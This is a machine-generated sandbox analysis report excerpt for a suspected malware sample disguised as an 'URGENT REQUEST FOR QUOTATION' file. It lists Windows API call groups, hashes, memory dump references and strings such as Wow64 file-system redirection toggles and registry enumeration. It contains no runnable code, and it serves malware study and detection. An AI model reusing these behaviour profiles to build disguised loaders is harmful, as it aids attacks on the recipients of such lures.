                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: DllGetClassObject
                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                      • Opcode ID: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                                                                                                      • Instruction ID: 2c87bd64bb4d5f2af65b8c79ea4e0f53eb747df96d5298733aa2de7012e7e6bd
                                                                                                                      • Opcode Fuzzy Hash: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                                                                                                      • Instruction Fuzzy Hash: 7141AF72624204EFDF25CF54C884A9A7BA9EF45710F2480ADFD099F24AD7B1DD40EBA0
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3E35
                                                                                                                      • IsMenu.USER32(?), ref: 000C3E4A
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3E92
                                                                                                                      • DrawMenuBar.USER32 ref: 000C3EA5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                      • Opcode ID: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                                                      • Instruction ID: fc8c26302beca0f162127ae5be3321dfb2a269f05c90d7829acf35bad92e3b8e
                                                                                                                      • Opcode Fuzzy Hash: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                                                      • Instruction Fuzzy Hash: 62411475A11209AFEB20DF50D884EAEBBF9FF49354F04812DE905A7290D734AE45DBA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00091E66
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00091E79
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00091EA9
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                      • Opcode ID: cfe98dd91793a08af25670be597422186c89dfaaa3fd403a5fbf266187d98518
                                                                                                                      • Instruction ID: b164fc52dac731567b5ef6f2d2418a1d727c9de61bb0c2ebbd8a79d356930e7c
                                                                                                                      • Opcode Fuzzy Hash: cfe98dd91793a08af25670be597422186c89dfaaa3fd403a5fbf266187d98518
                                                                                                                      • Instruction Fuzzy Hash: 56212475A00109BFEF15ABA4DC4ACFFB7BCDF46350F104129F925A71E2DB784909AA20
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                      • API String ID: 176396367-4004644295
                                                                                                                      • Opcode ID: 018dc627ac9563bdb9d112ca2c8169490b28aecf37c6c033bdd3f26ebd37acb2
                                                                                                                      • Instruction ID: e42863a3df0b5442346cc8bae310b7176f39b79ac9e0a75b022b9f00936ae837
                                                                                                                      • Opcode Fuzzy Hash: 018dc627ac9563bdb9d112ca2c8169490b28aecf37c6c033bdd3f26ebd37acb2
                                                                                                                      • Instruction Fuzzy Hash: 0931E473A0016A4BEB60EF2CD8419FF33D19BA1758F554029EC45AB245EA71CE84D3A2
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000C2F8D
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 000C2F94
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000C2FA9
                                                                                                                      • DestroyWindow.USER32(?), ref: 000C2FB1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                      • Opcode ID: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                                                                                                      • Instruction ID: 18da10f83344b2438dbb1aff751c2f6d216a065a2675f4c2b1c49ce40dfee653
                                                                                                                      • Opcode Fuzzy Hash: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                                                                                                      • Instruction Fuzzy Hash: 83218672200209ABEB218FA4DC80FBF77B9EB59364F10423DFA54965A0D671DC929760
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002), ref: 00054D8D
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00054DA0
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000), ref: 00054DC3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                                                                                                      • Instruction ID: ae99454ce7809b09e65a77067d877e355af7b897ac9b877d4b4601e1c914f2a6
                                                                                                                      • Opcode Fuzzy Hash: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                                                                                                      • Instruction Fuzzy Hash: 0EF03C34A40208ABFB119B91DC49FEEBBF5EF44756F0400A5ED09A6260CB745A84DAA1
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32 ref: 0008D3AD
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0008D3BF
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0008D3E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                      • API String ID: 145871493-2590602151
                                                                                                                      • Opcode ID: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                                                                                                      • Instruction ID: 305bc779e533fb76bb0e11053e76d874639cd1aee333fd983066eb9d81c460b6
                                                                                                                      • Opcode Fuzzy Hash: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                                                                                                      • Instruction Fuzzy Hash: 65F02770405521ABF7713710CC24D6D7710BF21701F544317E889F2085CB24CE408782
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                      • Opcode ID: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                                                                                                      • Instruction ID: 7fa502b466a8f14d8a771a43eff0fa5f36cef0c688b609e25665f9d80ea38070
                                                                                                                      • Opcode Fuzzy Hash: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                                                                                                      • Instruction Fuzzy Hash: F0E0CD35E025225BF2731726EC18F6F759CAFC2F62F090115FD08D6110DB74DD0240A0
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                      • Opcode ID: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                                                                                                      • Instruction ID: fd6b52087604cb1edace48b71b1686ef44f128de4d1be8e9e20b7805669c7b7a
                                                                                                                      • Opcode Fuzzy Hash: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                                                                                                      • Instruction Fuzzy Hash: 20D0C232902A215776231B26EC18E8F3A5CAF82F217090114FE08AA110CF24CD0281D0
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2C05
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 000A2C87
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A2C9D
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CAE
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3226157194-0
                                                                                                                      • Opcode ID: 8191a1a5f0aee145797dc5b3b74ebcc002980ceb0d8a3a82557da17f339a413b
                                                                                                                      • Instruction ID: 44bbc15a8ef6fa58dec5c0ca6bdba68796d5ead040726d42f86482692e384646
                                                                                                                      • Opcode Fuzzy Hash: 8191a1a5f0aee145797dc5b3b74ebcc002980ceb0d8a3a82557da17f339a413b
                                                                                                                      • Instruction Fuzzy Hash: 5EB15D71900119ABDF25DBE8CC85EDEB7BDEF49350F1040A6FA09E6152EB319A448F61
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000BA427
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000BA435
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000BA468
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000BA63D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3488606520-0
                                                                                                                      • Opcode ID: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                                                                                                      • Instruction ID: 0c39c7852a2acdb076bb9b887cc3dce990163d1f5a8053a072280e3559fd9a72
                                                                                                                      • Opcode Fuzzy Hash: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                                                                                                      • Instruction Fuzzy Hash: A0A1A2B1604701AFE720DF24C886F6AB7E5AF84714F14881DF69ADB392D770ED418B92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0009E473
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009E4AC
                                                                                                                      • _wcslen.LIBCMT ref: 0009E5EB
                                                                                                                      • _wcslen.LIBCMT ref: 0009E603
                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0009E650
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3183298772-0
                                                                                                                      • Opcode ID: a908a008ad0f1f1f5a4847cfcdcf5a31e4712bb4b389b775588e19b450fd977e
                                                                                                                      • Instruction ID: 9b4d456def73e08312c04bea2c2009a0508a6ba5685c76040a9087bd311efcbe
                                                                                                                      • Opcode Fuzzy Hash: a908a008ad0f1f1f5a4847cfcdcf5a31e4712bb4b389b775588e19b450fd977e
                                                                                                                      • Instruction Fuzzy Hash: 1D5151B24083859BDB64DB90D8919DF73ECAF85340F00491EF689D3192EF74A6889766
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBAA5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBB00
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000BBB63
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 000BBBA6
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBBB3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 826366716-0
                                                                                                                      • Opcode ID: bbda2670dc825feba39b069cc79ea715c63a66a0d13939ab5ff34cb7ab0135e0
                                                                                                                      • Instruction ID: 5b8a3b6fb320df49dc0649e791a967c818ab36f9f6d24b3c45223a70e69f251f
                                                                                                                      • Opcode Fuzzy Hash: bbda2670dc825feba39b069cc79ea715c63a66a0d13939ab5ff34cb7ab0135e0
                                                                                                                      • Instruction Fuzzy Hash: 7361B231208241EFD714DF14C890EAABBE9FF84308F54855DF4998B2A2DBB1ED45CB92
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00098BCD
                                                                                                                      • VariantClear.OLEAUT32 ref: 00098C3E
                                                                                                                      • VariantClear.OLEAUT32 ref: 00098C9D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00098D10
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00098D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4136290138-0
                                                                                                                      • Opcode ID: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                                                                                                      • Instruction ID: 7e7b9e5f4a6e107aa4bc15f98bd8b17c0405ae819c3ebd72f59a45b93c98794c
                                                                                                                      • Opcode Fuzzy Hash: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                                                                                                      • Instruction Fuzzy Hash: 145146B5A01219EFDB14CF68C894EAAB7F8FF89310F158569E909DB350E734E911CB90
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000A8BAE
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000A8BDA
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000A8C32
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000A8C57
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000A8C5F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
